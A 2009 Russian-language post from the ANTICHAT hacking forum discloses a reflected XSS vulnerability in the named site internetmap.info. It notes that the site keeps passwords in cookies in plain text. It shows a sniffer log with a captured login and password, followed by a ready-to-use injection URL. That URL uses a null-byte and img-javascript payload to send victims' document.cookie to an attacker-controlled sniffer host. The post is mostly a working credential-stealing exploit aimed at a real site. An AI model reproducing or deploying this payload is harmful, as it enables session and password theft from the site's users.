HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу internetmap.info XSS
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

internetmap.info XSS
  #1  
Старый 24.02.2009, 20:56
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
С нами: 10077446

Репутация: 3965


По умолчанию internetmap.info XSS
internetmap.info XSS
Достаточно крупный проект. Пароли в куках там хранятся в чистом виде. При отправки на сниффер будет иметь вид:

Код:
Запрос с www.internetmap.info — 24.02.2009 16:35
	IP: **.**.**.** (whois)
QUERY: b=b; login=admin@mail.ru; password=Pass; b=b
REFERER: http://www.internetmap.info/cgi-bin/engine.cgi?a=%00%3Cimg%20src='javascript:img%20=%20new%20Image()%3b%20img.src%20=%20%22http://www*.com/s/s.gif?%22%2bdocument.cookie%3b'%3E&i=designers&f=works
AGENT: Opera/10.00 (Windows NT 5.1; U; en) Presto/2.2.0
Скрипт декодить URL, обрезает спецсимволы (; в том числе). Формируем иньекцию:
Код:

http://www.internetmap.info/cgi-bin/engine.cgi?a=%00%3Cimg%20src='javascript:img%20=%20new%20Image()%3b%20img.src%20=%20%22http://снифер/s/s.gif?%22%2bdocument.cookie%3b'%3E&i=designers&f=works
© Dimi4, 2009
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось Dimi4; 24.02.2009 в 21:05..
 
Ответить с цитированием
 



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Xss: Cегодня и вчера. Опрос Constantine Болталка 48 07.12.2009 08:57
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.